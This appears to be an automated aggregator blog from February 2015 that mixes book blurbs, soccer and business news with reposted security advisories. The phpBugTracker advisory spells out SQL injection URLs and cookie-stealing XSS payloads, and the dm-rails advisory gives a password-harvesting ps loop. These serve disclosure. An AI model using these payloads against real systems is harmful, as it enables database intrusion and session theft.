Latest YouTube Video

Saturday, February 21, 2015

Book Release: All That Remains Scarpetta 3 by Cornwell, Patricia.

With All That Remains #1 New York TimesIn Richmond, Virginia, young lovers are dying. So far, four couples in the area have disappeared, only to be found months later as mutilated corpses. When the daughter of the president's newest drug czar vanishes along with her boyfriend, Dr. Kay Scarpetta knows time is short. Following a macabre trail of evidence that ties the present homicides to a grisly crime in the past, Kay must draw upon her own personal resources to track down a murderer who is as s



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 21, 2015 at 02:15PM

Desert Diamond Cup Live Stream: Seattle Sounders vs. Sporting Kansas City (10 pm ET)



Two of MLS' best teams in recent years, Seattle Sounders and Sporting Kansas City, face off in the nightcap of matchday 2 of the Desert Diamond Cup on Saturday in Tucson.


The Sounders had the biggest win of the tournament's first day, blasting past hosts FC Tucson 6-0. Sporting, meanwhile, drew 2-2 against the Colorado Rapids.


You can watch the game above, which begins at 10 pm ET, live from Arizona.


Read More



from MLSsoccer.com News http://ift.tt/1D3Pafo

via IFTTT

[FD] Defense in depth -- the Microsoft way (part 29): contradicting, ambiguous, incomplete documentation

[FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure Author: Larry W. Cashdollar, @_larry0 Date: 2015-02-17 Download Site: http://ift.tt/1FbBdvs Vendor: Martin Gamsjaeger, Dan Kubb Vendor Notified: 2015-02-17 Vendor Contact: notreal [at] rhnh.net Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically. Vulnerability: The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb: def execute(statement) system( 'mysql', (username.blank? ? '' : "--user=#{username}"), (password.blank? ? '' : "--password=#{password}"), '-e', statement ) end OSVDB:118579 Exploit Code: • $ while (true) do ps -ef |grep [p]assword; done Advisory: http://ift.tt/1B2dBfB



Source: Gmail -> IFTTT-> Blogger

How weather affects what you tip the delivery guy

Winter weather conditions can cause tips for online food deliveries to jump.



from Business and financial news - CNNMoney.com http://ift.tt/1w1vE3J

via IFTTT

My debt collection horror story

Law firm Linebarger Goggan Blair & Sampson rakes in big money going after everything from unpaid parking tickets to back taxes. But many of the millions of people the firm goes after say they have been unfairly targeted. Here are three of their stories.



from Business and financial news - CNNMoney.com http://ift.tt/1G7ee5S

via IFTTT

Labor Secretary: 'Damage done' by port strike





from Business and financial news - CNNMoney.com http://ift.tt/1D3FrWb

via IFTTT

MLS Update February 21, 2015 at 01:00PM

Desert Diamond Cup Live Stream: Real Salt Lake vs. FC Tucson (8 pm ET)



The second day of Desert Diamond Cup play takes place on Saturday in Tucson, and the second match of the day pits tournament hosts FC Tucson against MLS powerhouse Real Salt Lake at 8 pm ET.


Read More



from MLSsoccer.com News http://ift.tt/1DFgpiZ

via IFTTT

MLS Update February 21, 2015 at 12:58PM

LA Galaxy head coach Bruce Arena calls European tour a "very good trip", says no decision yet on Mika Vayrynen


DUBLIN – Time is running out for MLS coaches to fine-tune their squads ahead of the new season kicking off, but Bruce Arena is relatively pleased with his situation.


Ready to return to Los Angeles after a preseason trip to Ireland and Sweden, the LA Galaxy head coach admitted that there is still some work to be done. Yet, they have made a huge amount of progress.


Read More



from MLSsoccer.com News http://ift.tt/1Agxld9

via IFTTT

Benfica comes back 3-1 at Moreirense to increase lead

LISBON, Portugal (AP) Benfica fought back for a 3-1 win at 10-man Moreirense to provisionally increase its lead of the Portuguese league on Saturday.



from FOX Sports Digital http://ift.tt/1DFaqed

via IFTTT

MLS Update February 21, 2015 at 12:13PM

Desert Diamond Cup Live Stream: Colorado Rapids vs. New England Revolution (7:30 pm ET)



The Colorado Rapids and New England Revolution will meet in matchday 2 of the Desert Diamond Cup in Tucson on Saturday, with both sides looking for their first victory in the preseason tournament.


The game, set for a 7:30 pm ET kickoff, sees the Rapids, who drew 2-2 on Wednesday with Sporting KC, take on the Revs, who lost 1-0 to Real Salt Lake, also on Wednesday.


You can watch the game above, live, as it happens from Arizona.


Read More



from MLSsoccer.com News http://ift.tt/1LoA1Y2

via IFTTT

PAOK beats Veria 3-1, stays 3rd in Greek league

ATHENS, Greece (AP) PAOK scored all of its goals in the first half and coasted to a 3-1 victory at Veria in the Greek league on Saturday.



from FOX Sports Digital http://ift.tt/1ECNMAd

via IFTTT

MLS Update February 21, 2015 at 11:42AM

FC Dallas fill a key hole in attack with the signing of versatile, fast winger Michael Barrios



In a perfect world, the signing of Michael Barrios will create a lethal, Colombian one-two punch on the wings for FC Dallas.


Read More



from MLSsoccer.com News http://ift.tt/1B1pu3S

via IFTTT

MLS Update February 21, 2015 at 11:10AM

Follow along with Day 1 of the Carolina Challenge Cup


The Carolina Challenge Cup 2015 gets underway on Saturday, and with it, two very intriguing match-ups.


First, the Houston Dynamo will square off against tournament hosts and 2015 USL affiliiate club Charleston Battery, at 5 pm ET. You can check out the LIVE STREAM of the game here.


Read More



from MLSsoccer.com News http://ift.tt/1zvU7ty

via IFTTT

I have a new follower on Twitter



Susan Bennett

Susan Bennett, Voice-over Artist and Singer. Most of you know me as the voice of Siri. VOX, inc. Los Angeles, http://t.co/fPe3O1VbSy

Atlanta, GA

http://t.co/PnkYOaIKuH

Following: 82609 - Followers: 121650



February 21, 2015 at 04:20PM via Twitter http://ift.tt/1dS2fxo

Coming soon: A change in who gets overtime pay

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1vOdFxu

via IFTTT

Super-sneaky malware found in companies worldwide

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1FoJtMb

via IFTTT

Man City beat Newcastle 5-0, close gap to five points with Prem leaders Chelsea, who drew 1-1 vs. Burnley; Arsenal third (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Book Release: The Secret Life of the Grown-up Brain by Strauch, Barbara

A leading science writer examines how our brains improve in middle age. Pulitzer Prize-winning science writer Barbara Strauch explores the latest findings that demonstrate how the middle-aged brain is more flexible and capable than previously thought. In fact, new research from neuroscientists and psychologists suggests that the brain reorganizes, improves in important functions, and even helps us adopt a more optimistic outlook in middle age. We recognize patterns faster, make better judgments,



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Hardly Knew Her by Lippman, Laura

New York Times bestselling author Laura Lippman has been hailed as one of the best crime fiction writers in America today, winning virtually every major award in the genre. The author of the enormously popular series featuring Baltimore P.I. Tess Monaghan as well as three critically lauded stand-alone novels, Lippman now turns her attention to short stories — and reveals another level of mastery. Lippman sets many of the stories in this sterling anthology, Hardly Knew Her , in familiar territory



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Benjamin Franklin by Isaacson, Walter

In this authoritative and engrossing full-scale biography, Walter Isaacson, bestselling author of Einstein and Steve Jobs , shows how the most fascinating of America's founders helped define our national character. Benjamin Franklin is the founding father who winks at us, the one who seems made of flesh rather than marble. In a sweeping narrative that follows Franklin's life from Boston to Philadelphia to London and Paris and back, Walter Isaacson chronicles the adventures of the runaway apprent



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: The Easy Vegetarian Kitchen by Alderson, Erin

Fresh, delicious vegetables should be a staple of any diet, but if you've decided that you'd like to take your Meatless Mondays to a whole new level, then it might be time to ditch the processed foods and meats and try out a vegetarian diet. Eating vegetarian doesn't have to be complicated! In fact, it can be downright scrumptious and satisfying. The Easy Vegetarian Kitchen helps you to create simple meals that will help you live a happier and healthier life. Erin Alderson, the popular voice beh



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Storm Warning by Sue, Park, Linda

The end is near! Book 9 of the #1 NY Times Bestselling series. JOIN ANYTIME TO PLAY FOR THE CHANCE TO WIN! Throughout the hunt for the 39 Clues, Amy and Dan have encountered some of the darkest aspects of history . . . and had to deal with the role their family played. But are they ready for the truth? In this thrilling ninth installment, Amy and Dan hit the high seas as they follow the trail of some infamous ancestors to track down a long lost treasure. However, the real prize isn't hidden in a



Source: Baltimore County Public Library - New Books

via IFTTT

[FD] Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

#Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 > A Type Confusion Vulnerability was discovered in unserialize() with DateTimeZone object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks. Affected Versions



Source: Gmail -> IFTTT-> Blogger

[FD] Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

#Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273] Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 > A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0 Advisory ID: SROEADV-2015-16 Author: Steffen Rösemann Affected Software: phpBugTracker v.1.6.0 Vendor URL: http://ift.tt/1zV5gTV Vendor Status: patched CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31 ========================== Vulnerability Description: ========================== The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities. ================== Technical Details: ================== The following files used in a common phpBugTracker installation suffer from different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities: =========== project.php =========== SQL injection / underlaying CSRF vulnerability in project.php via id parameter: http:// {TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+ Stored XSS via input field "project name": http://{TARGET}/admin/project.php?op=add executed in: e.g. http://{TARGET}/admin/project.php, http:// {TARGET}/index.php ======== user.php ======== Reflecting XSS in user.php via use_js parameter: http:// {TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 executed in: same page ========= group.php ========= Reflecting XSS in group.php via use_js parameter: http:// {TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1 executed in: same page (Blind) SQL Injection / underlaying CSRF vulnerability in group.php via group_id parameter (used in different operations): http:// {TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ http:// {TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+ ========== status.php ========== SQL injection / underlaying CSRF vulnerability in status.php via status_id parameter: http:// {TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ Stored XSS via input field "Description": http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0 executed in: e.g. http://{TARGET}/admin/status.php CSRF vulnerability in status.php (delete statuses): ============== resolution.php ============== SQL injection / underlaying CSRF vulnerability in resolution.php via resolution_id parameter: http:// {TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in resolution.php (delete resolutions): ============ severity.php ============ SQL injection / underlaying CSRF vulnerability in severity.php via severity_id parameter: http:// {TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ CSRF vulnerability in severity.php (delete severities): Stored XSS in severity.php via input field "Description": http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0 executed in: e.g. http://{TARGET}/admin/severity.php ============ priority.php ============ SQL injection / underlaying CSRF vulnerability in priority.php via priority_id parameter: http:// {TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+ ====== os.php ====== SQL Injection / underlaying CSRF vulnerability in os.php via os_id parameter: http:// {TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in os.php (delete operating systems): Stored XSS vulnerability in os.php via input field "Regex": http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0 executed in: e.g. http://{TARGET}/admin/os.php? ============ database.php ============ SQL injection / underlaying CSRF vulnerability in database.php via database_id: http:// {TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+ CSRF vulnerability in database.php (delete databases): Stored XSS vulnerability in database.php via input field "Name": http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0 ======== site.php ======== CSRF vulnerability in site.php (delete sites): SQL injection / underlaying CSRF vulnerability in site.php via site_id parameter: http:// {TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+ ======= bug.php ======= This issue has already been assigned CVE-2004-1519, but seems to have not been corrected since the assignment: SQL injection / underlaying CSRF vulnerability in bug.php via project parameter: http:// {TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+ For details see http://ift.tt/1zV5hab. ========= Solution: ========= Update to version 1.7.0. ==================== Disclosure Timeline: ==================== 03/05-Feb-2015 – found the vulnerabilities 05-Feb-2015 - informed the developers (see [3]) 05-Feb-2015 – release date of this security advisory [without technical details] 05-Feb-2015 - forked the Github repository, to keep it available for other security researchers (see [4]) 05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities 09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://ift.tt/1zV5gTV [2] http://ift.tt/18bByV4 [3] http://ift.tt/1zV5j1S [4] http://ift.tt/18bByV8



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3 Advisory ID: SROEADV-2015-15 Author: Steffen Rösemann Affected Software: MyBB v. 1.8.3 Vendor URL: http://www.mybb.com Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the administrative backend. ================== Technical Details: ================== The stored XSS-vulnerabilities can be found in different modules in the following locations of a common MyBB installation: ====================== Module "config-attachment_types" ====================== via form-field MIME-type: http://{TARGET}/admin/index.php?module=config-attachment_types&action=add executed in: e.g. http:// {TARGET}/admin/index.php?module=config-attachment_types =============== Module "config-mycode" =============== via form fields "title" and "short description": http://{TARGET}/admin/index.php?module=config-mycode&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode =================== Module "forum-management" =================== via form field "title": http://{TARGET}/admin/index.php?module=forum-management&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=forum ============== Module "user-groups" ============== via form fields "title" and/or "short description": http://{TARGET}/admin/index.php?module=user-groups&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups ================ Module "style-templates" ================ via form field "name": http://{TARGET}/admin/index.php?module=style-templates&action=add_set executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates ==================================== Module "style-templates" in action "add_template_group" ==================================== via form field "title": http:// {TARGET}/admin/index.php?module=style-templates&action=add_template_group executed in: e.g. http:// {TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID} ============= Module "tool-tasks" ============= via form field "title": http://{TARGET}/admin/index.php?module=tools-tasks&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================= Module "config-post_icons" ================= via form field "name": http://{TARGET}/admin/index.php?module=config-post_icons&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ============= Module "user-titles" ============= via form field "title to assign": http://{TARGET}/admin/index.php?module=user-titles&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================ Module "config-banning" ================ via form field "username": http://{TARGET}/admin/index.php?module=config-banning&type=usernames executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ========= Solution: ========= Upgrade to v. 1.8.4. ==================== Disclosure Timeline: ==================== 02/03-Feb-2015 – found the vulnerabilities 03-Feb-2015 - informed the developers according to their security issue rules (see [3]) 03-Feb-2015 – release date of this security advisory [without technical details] 03-Feb-2015 - vendor replied, issues will be patched 15-Feb-2015 - vendor released patch v. 1.8.4 (see [4]) 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://www.mybb.com [2] http://ift.tt/1CV14ph [3] http://ift.tt/18bysjY [4] http://ift.tt/1CV14pl



Source: Gmail -> IFTTT-> Blogger

[FD] iTunes 12.1.1 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

[FD] Defense in depth -- the Microsoft way (part 28): yes, we can (create even empty, but properly quoted pathnames)

Hi @ll, in order to prevent the start of the defunct USENET news client (alias "Windows Mail") that Microsoft installs with Windows 7 and later versions of Windows as "Microsoft Outlook NewsReader", the installation of all editions of Microsoft Office 2010 which include Microsoft Outlook 2010 as well as the standalone version of the latter create the following registry entries for the "Microsoft Outlook NewsReader" with empty pathnames for the icons and in the command lines:



Source: Gmail -> IFTTT-> Blogger

[FD] Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

CVE-2015-0555 Introduction ************************************************************* There is a Buffer Overflow Vulnerability which leads to Remote Code Execution. Vulnerability is due to input validation to the API ReadConfigValue and WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx This is different from CVE-2014-3911 as the version of iPolis 1.12.2 (latest as of 12/12/2014). CVE-2014-3911 is related to different ActiveX and on older iPolis version Discovery MEthod: Fuzzing Exploiting: It is a client side attack where attacker can host a crafted HTML web page with malicious payload and entice the victim to browse to the hosted page to compromise the victim. Operating System: Windows 7 Ultimate N SP1 ************************************************************* Vulnerability1: *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution* ******************Proof of Concept (PoC)**************8 Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution ***************************************************************************************** *Vulnerability2: * *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution * *******************Proof of Concept (PoC)********************* **************************************************************************** CERT contacted Samsung but there wasn't any response from Samsung. Refer http://blog.disects.com for more details Best Regards, Praveen Darshanam



Source: Gmail -> IFTTT-> Blogger

[FD] VLC for Android beta crash

Hello, What do you think about it? http://ift.tt/19OzfrD VLC for Android Beta was downloaded by over 10.000.000. This file crash this app. On VLC beta for Windows bug is exploitable. Currently for windows is fixed, but for android is still vulnerable.



Source: Gmail -> IFTTT-> Blogger

[FD] New version of Hyperion PE runtime encrypter

Hi, We just released version 1.2 of our PE encrypter, hyperion. [ CHANGELOG ] - added support for Windows 8 and 8.1 [ DESCR ] Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". [ LINKS ] Tool @ http://ift.tt/19Ozfru Papers/slides available @ http://ift.tt/1CZu9SW cheers, noptrix



Source: Gmail -> IFTTT-> Blogger

[FD] Easy Social Icons WordPress plugin v1.2.2 Persistent XSS and CSRF

[FD] WooCommerce WordPress plugin 2.2.10 Reflected XSS

==================================================== Product: WooCommerce WordPress plugin Vendor: WooThemes Tested Version: 2.2.10 Vulnerability Type: Cross-Site Scripting [CWE-79] Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Solved in version 2.2.11 Discovered and Provided: Eric Flokstra - ITsec Security Services ==================================================== [-] About the Vendor: WooCommerce is a popular open source WordPress e-commerce plugin with around 6.2 million downloads.It is built by WooThemes and designed for small to large-sized online merchants. [-] Advisory Details: The WooCommerce plugin gives users the ability to see their stores performance from month to month using graphs and stats. However insufficient validation on the request retrieving the reports is performed, enabling remote execution of arbitrary scripting code in the target's web browser. This scripting code will be executed within the security context of the WordPress admin panel. [-] Proof of Concept: http://ift.tt/1MGUwCy">> [-] Disclosure Timeline: [28 Jan 2015]: Vendor notification [29 Jan 2015]: Vulnerability confirmation [29 Jan 2015]: Vulnerability patched [19 Feb 2015]: Public disclosure [-] Solution: Update to version 2.2.11. [-] References: [1] WooCommerce Changelog



Source: Gmail -> IFTTT-> Blogger

Onion.City — Search Engine for Deep Web that Works From Normal Web Browser

There is an entire section of the Internet that you probably don’t see on daily basis, it’s called the "Darknet" or "Deep Web", where all browsing is done anonymously. About a week ago, we reported about the 'Memex' Deep Web Search Engine, a Defense Advance Research Projects Agency (DARPA) project to create a powerful new search engine that could find things on the deep web that isn't





from The Hacker News http://ift.tt/1AZSnNM

via IFTTT

An Evening Sky Conjunction



Eight years ago, an evening sky held this lovely pairing of a young crescent Moon and brilliant Venus. Seen near the western horizon, the close conjunction and its wintry reflection were captured from Bolu, Turkey, planet Earth on February 19, 2007. In the 8 Earth years since this photograph was taken Venus has orbited the Sun almost exactly 13 times, so the Sun and Venus have now returned to the same the configuration in Earth's sky. And since every 8 years the Moon also nearly repeats its phases for a given time of year, a very similar crescent Moon-Venus conjunction will again appear in planet Earth's evening skies tonight. But the February 20, 2015 version of the conjunction will also include planet Mars. Much fainter Mars will wander even closer to Venus by the evening of February 21. via NASA http://ift.tt/17yarSS

Friday, February 20, 2015

Vidi aquam

Composer, Anonymous. Key, D major. Language, Latin. Piece Style, Classical. Instrumentation, Chorus: Sopranos, Altos, Tenors and Basses



from Google Alert - anonymous http://ift.tt/1GdJRuz

via IFTTT

MLS Update February 20, 2015 at 03:40PM

2015 Preseason Schedule | By Date





BY DATE




BY CLUB


Read More



from MLSsoccer.com News http://ift.tt/1BMUdm7

via IFTTT


MLS Update February 20, 2015 at 05:11PM

Fan favorite, trialist Dane Richards will get another chance to impress for New York Red Bulls vs. OKC Energy


Could the New York Red Bulls soon be set to welcome home one of their supporters' old favorites?


After making his first appearance in a Red Bulls jersey since July 2012 in a 1-1 preseason draw against Danish side HB Koge in Bradenton, Fla. on Wednesday, winger Dane Richards will look to continue to make his case to manager Jesse Marsch on Saturday in his quest for a contract.


Read More



from MLSsoccer.com News http://ift.tt/1AWPj6z

via IFTTT

MLS Update February 20, 2015 at 03:54PM

Colorado Rapids announce signing of Argentine attacker Juan Ramirez as young Designated Player


Colorado Rapids officially announced Friday the acquisition of Argentinos Juniors midfielder Juan Ramirez, the second Designated Player in franchise history, pending the receipt of his P-1 Visa and ITC.


Per league policy, terms of the deal were not disclosed.


Read More



from MLSsoccer.com News http://ift.tt/1vQLNTE

via IFTTT

MLS Update February 20, 2015 at 03:08PM

Live Stream: Watch FC Dallas take on DC United in preseason action (8:30 pm ET)



Are you ready for more MLS preseason action on this Friday evening? You're in luck.


FC Dallas are hosting D.C. United at Toyota Stadium (8:30 pm ET). You can watch the game via the stream above if you can't make it out to the match.


Read More



from MLSsoccer.com News http://ift.tt/1FESXDm

via IFTTT

Is a prime time shakeup coming at MSNBC?

Is a prime time shakeup coming up next at MSNBC? "We have no plans to take Chris Hayes' show off the air, or move Rachel Maddow's show," a spokesperson says.



from Business and financial news - CNNMoney.com http://ift.tt/1CXx7XX

via IFTTT

MLS Update February 20, 2015 at 01:41PM

Crash course: Portland Timbers hoping new backline pieces come together to solve defensive problems


PORTLAND, Ore. – When Portland Timbers fans say hello to their team again Sunday with the start of the Simple Invitational preseason tournament at Providence Park – their first game action in the Rose City since last season – they’ll see plenty of familiar faces.


There will be, however, some new players on the field – in very important positions.


Read More



from MLSsoccer.com News http://ift.tt/1LnIe0l

via IFTTT

I have a new follower on Twitter



Inner Healing

Download Hypnosis & Subliminal MP3s - For FREE



http://t.co/SqxtK25gC6

Following: 4047 - Followers: 14566



February 20, 2015 at 07:38PM via Twitter http://ift.tt/1D9k1qa

Bill O'Reilly has some fighting words for Mother Jones

Bill O'Reilly continued to to excoriate Mother Jones on Friday for a critical report on his time covering the Falklands War.



from Business and financial news - CNNMoney.com http://ift.tt/1AVD3mI

via IFTTT

Book Release: The Twelfth Card A Lincoln Rhyme Novel by Deaver, Jeffery.

Bestselling master of suspense Jeffery Deaver is back with a brand-new Lincoln Rhyme thriller. To save the life of a young girl who's being stalked by a ruthless hit man, Lincoln and his protégé, Amelia Sachs, are called upon to do the impossible: solve a truly "cold case" -- one that's 140 years old. The Twelfth Card The motive may have to do with a term paper that Geneva is writing about her ancestor, Charles Singleton, a former slave. A teacher and farmer in New York State, Charles was act



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 20, 2015 at 12:45PM

Former New York Red Bulls star Thierry Henry joins Arsenal as youth coach


Thierry Henry’s time away from the pitch didn’t last very long.


Read More



from MLSsoccer.com News http://ift.tt/1AVzU6C

via IFTTT

'Orange is the new Black' get hosed by the Emmys?

The Television Academy passed new rule changes that expand category field, and define comedy and dramas.



from Business and financial news - CNNMoney.com http://ift.tt/1LkC2nR

via IFTTT

Ten-man Monaco wins 1-0 at Nice in French league

NICE, France (AP) Substitute Bernardo Silva scored a late winner to give ten-man Monaco a 1-0 win at local rival Nice in the French league.



from FOX Sports Digital http://ift.tt/1LkCjaq

via IFTTT

Book Release: If Joan of Arc Had Cancer Finding Courage, Faith, and Healing from History's Most Inspirational Woman Warrior by Janet Lynn Roseman, PhD.

Reclaim Inner Strength, Courage, and Faith -- — Dr. Bernie S. Siegel, author of The Art of Healing and Love, Medicine, and Miracles -- — Ann Fonfa, president (volunteer), The Annie Appleseed Project



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Inheriting Fear by Vaile, Sandy.

Chef Mya Jensen's plate is already full. She has her job, her motorbike, her kickboxing - and she's the guardian of her disabled mother. She doesn't need a man in her life, and she definitely doesn't need her cocky new neighbour, Detective Luca Patterson, linking her to his latest investigation.Luca has never crossed a professional line - until he meets Mya. She is sexy, feisty, and so many kinds of wrong, but he can't stop thinking about her. Maybe because every time he's onto a lead in his lat



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Reforming Gabe by Hunter Pace, Alicia.

The world loved Heisman trophy winner and two-time Super Bowl champion Gabe Beauford - until he blew it and cost San Antonio the chance to make history. Now his brother's wedding back in Beauford Bend offers the perfect hideout.Neyland MacKenzie has a passion for jewelry making and a hatred for football. Neither is working out very well. With sales down, it's getting harder to pay the rent or buy new materials, and she can't escape the notoriety of being the daughter of the beloved Beauford high



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: A Work of Art by Maysonet, Melody.

Shy, artistic Tera can't wait to attend a prestigious art school in France to prove to her famous artist father that she can make something of herself. But Tera's hopes for the future explode when the police arrest her dad for an unspeakable crime. Her father's arrest must be a mistake, so Tera goes into action, sacrificing her future at art school to pay for his defense. Meanwhile, she falls head over heels for Joey, a rebel musician who makes her feel wanted and asks no questions about her pas



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Five-Minute Relationship Repair Quickly Heal Upsets, Deepen Intimacy, and Use Differences to Strengthen Love by Susan Campbell, PhD; John Grey, PhD.

The Tool Kit No Relationship Should Be WithoutLong-term happiness in love depends on a couple’s ability to repair the inevitable rifts and differences, large and small, that occur in any relationship. Neuroscience suggests that relationship upsets are best mended quickly, or they accumulate in long-term memory, increase reactive communication, and become harder to repair successfully. And good repair takes five minutes or less! This book offers practical tools and suggested scripts for resolving



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 20, 2015 at 11:35AM

Former US youth international, FC Dallas goalkeeper Josh Lambo gunning for NFL career | SIDELINE


Josh Lambo is hoping to take his football career swap to the professional level.


Read More



from MLSsoccer.com News http://ift.tt/1LkxMoq

via IFTTT

Stocks zoom to record highs on Greek deal

Not even an arctic freeze can stop this bull market. Stocks hit new records in response to a deal to keep Greece from leaving the eurozone.



from Business and financial news - CNNMoney.com http://ift.tt/1AV3pW1

via IFTTT

MLS Update February 20, 2015 at 11:06AM

LA Galaxy encounter rock-star treatment in Ireland as Robbie Keane's exploits open eyes to MLS


DUBLIN – Robbie Keane will always draw a crowd in his hometown, but even he has been taken aback by the reception that the LA Galaxy have received in Dublin.


Once news had spread that the Republic of Ireland captain was bringing his club team to Tallaght Stadium for a preseason friendly with Shamrock Rovers, demand for tickets was unprecedented. Then he arrived home to wild fanfare.


Read More



from MLSsoccer.com News http://ift.tt/188BPYQ

via IFTTT

Book Release: Dessert for two : small-batch cookies, brownies, pies, and cakes by Lane, Christina (Food blogger)

Europe gives Greece another four months

Europe has agreed to extend its financial lifeline to Greece by four months provided it comes up with a list of acceptable economic reforms.



from Business and financial news - CNNMoney.com http://ift.tt/1CWiWCE

via IFTTT

MLS Update February 20, 2015 at 10:46AM

New York City FC's David Villa and Manchester City's Sergio Aguero face off again in skills challenge | SIDELINE


David Villa and Sergio Aguero showed off their set-piece skills once again in two additional editions of their skills challenge.


Villa, New York City FC’s first star signing, and Aguero, the star of sister club Manchester City, went head to head in crossbar and corner-kick challenges.


Read More



from MLSsoccer.com News http://ift.tt/1AsNPNY

via IFTTT

The Apple car: What we know

Here's all the evidence Apple is secretly building an Apple car -- or an Apple car OS.



from Business and financial news - CNNMoney.com http://ift.tt/1CW9tLJ

via IFTTT

Mother Jones to Fox: Apologize for war remark

